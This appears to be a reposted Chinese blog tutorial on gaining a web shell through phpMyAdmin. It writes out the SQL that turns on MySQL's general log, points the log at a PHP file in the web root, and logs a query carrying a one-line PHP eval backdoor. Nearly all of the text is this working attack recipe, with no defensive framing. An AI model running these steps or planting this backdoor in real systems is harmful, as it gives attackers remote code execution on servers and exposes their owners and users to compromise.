通過 phpmyadmin getshell


通過 phpmyadmin  getshell

general_log默認為關閉的,root權限開啟后,general_log_file會保存所有的查詢語句

可以開啟general_log,然后設置general_log_file為一個php文件,最后用一句話木馬進行查詢來獲取shell

進入phpmyadmin后在SQL處執行SQL語句

首先查看general log是否開啟

show variables like 'general_log';

 

general log是關閉狀態,執行SQL語句開啟general log

SET GLOBAL general_log = ON

 

 

開啟成功

然后把general_log_file設置為shell的絕對路徑

SET global general_log_file='D:/wamp/www/orange.php';

 

看下剛剛創建的orange.php里的內容

 

然后執行SQL查詢語句,寫個一句話進去。

SELECT '<?php @eval($_POST["orange"]);?>';

 

現在再看下orange.php里面的內容

成功插入了一句話木馬

一句話鏈接在根目錄(http://127.0.0.1/orange.php)

 

 

至此結束!

任重而道遠!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM